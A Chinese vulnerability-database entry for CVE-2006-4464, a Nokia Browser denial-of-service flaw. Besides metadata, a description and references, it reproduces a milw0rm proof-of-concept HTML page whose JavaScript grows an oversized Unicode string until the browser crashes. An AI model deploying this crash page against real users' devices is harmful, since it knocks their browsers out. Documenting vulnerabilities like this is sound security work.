Nokia Browser 超大Unicode字符串拒绝服务攻击漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1110812 漏洞类型 设计错误
发布时间 2006-08-13 更新时间 2006-09-15
CVE编号 CVE-2006-4464 CNNVD-ID CNNVD-200608-499
漏洞平台 Hardware CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/2176
https://cxsecurity.com/issue/WLB-2006090013
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200608-499
|漏洞详情
NokiaBrowser,可能是NokiaSymbian60Browser第三代版本中,远程攻击者可借助包含超大Unicode字符串的JavaScript触发拒绝服务攻击(崩溃)。
|漏洞EXP
<!--

Nokia Browser Crash by Qode

http://www.qode.org

-->

<html><body><script>

function crash()

               {

               alert('Nokia Browser Crash by Qode');

               shellcode = unescape('%ucccc');

               fill = unescape('%ucccc');

               addr = 0x02020202;

               var b = fill;

               while (b.length <= 0x400000) b+=b;

               }

</script>

Nokia Browser Crash by Qode<br>

<input type='button' onClick='crash()' value='Crash'>

</body></html>

# milw0rm.com [2006-08-13]
|参考资料

来源:BID
名称:19484
链接:http://www.securityfocus.com/bid/19484
来源:BUGTRAQ
名称:20060811NokiaBrowserCrash
链接:http://www.securityfocus.com/archive/1/archive/1/442990/100/200/threaded
来源:MILW0RM
名称:2176
链接:http://www.milw0rm.com/exploits/2176
来源:XF
名称:nokia-symbian-browser-dos(28353)
链接:http://xforce.iss.net/xforce/xfdb/28353
来源:SREASON
名称:1485
链接:http://securityreason.com/securityalert/1485
来源:MILW0RM
名称:2176
链接:http://milw0rm.com/exploits/2176